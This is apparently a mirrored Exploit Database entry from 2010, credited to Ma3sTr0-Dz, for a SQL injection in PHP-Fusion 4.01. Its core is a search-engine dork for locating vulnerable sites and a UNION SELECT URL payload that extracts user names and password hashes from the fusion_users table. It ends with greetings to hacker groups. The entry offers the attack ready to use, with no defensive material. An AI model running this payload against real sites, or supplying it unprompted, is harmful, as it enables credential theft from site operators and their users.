PHP-Fusion 4.01 – SQL Injection

• Exploit Database
• 13 阅读

• 作者： Ma3sTr0-Dz
  日期： 2010-05-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12635/

• # Exploit Title: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities
  
  # Date: 17/05/2010
  
  # Author: Ma3sTr0-Dz
  
  # Software Link: http://www.php-fusion.co.uk
  
  # Version: 4.01
  
  # CVE : N/A
  
  # Code : [exploit code]
  
  =======================================================PHP-Fusion v4.01 SQL INJECTION Vulnerabilities=======================================================############################################################## Name: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities .
  # Vendor: www.php-fusion.co.uk# Date: 2010/05/17# Author: Ma3sTr0-Dz# Home : Www.Sec4ever.Com
  # Contact: o5m@Hotmail.de#############################################################
  
  # Part Expl0it & Bug Codes :
  
  ---
  Dork : allinurl:readmore.php?news_id
  
  http://site.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*
  
  # Thanks to: Cmos_Clr -
   Hard_Hakerz- Sa4D - Mahmoud_SQL - RA3CH - His0k4 - Virus_Hacker_Dz - 
  HCJ 
  
  
  
  g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !